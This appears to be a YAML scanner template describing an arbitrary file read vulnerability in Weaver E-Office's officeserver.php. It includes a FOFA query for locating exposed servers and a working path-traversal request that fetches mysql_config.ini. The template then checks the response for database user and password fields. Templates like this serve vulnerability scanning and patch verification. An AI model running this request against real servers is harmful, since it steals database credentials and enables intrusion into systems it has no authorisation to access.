product: 泛微E-Office
vName: 泛微E-Office officeserver.php Arbitrary File Read
type: 文件读取
vID: [ ]
level: 3
vDesc: There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability.
version: ''
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/泛微OA/泛微OA E-Office officeserver.php 任意文件读取漏洞.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
    verify:
      logic: and
      check:
        - body:
            value:
              - datapassword =
              - datauser =
            logic: and
        - status: 200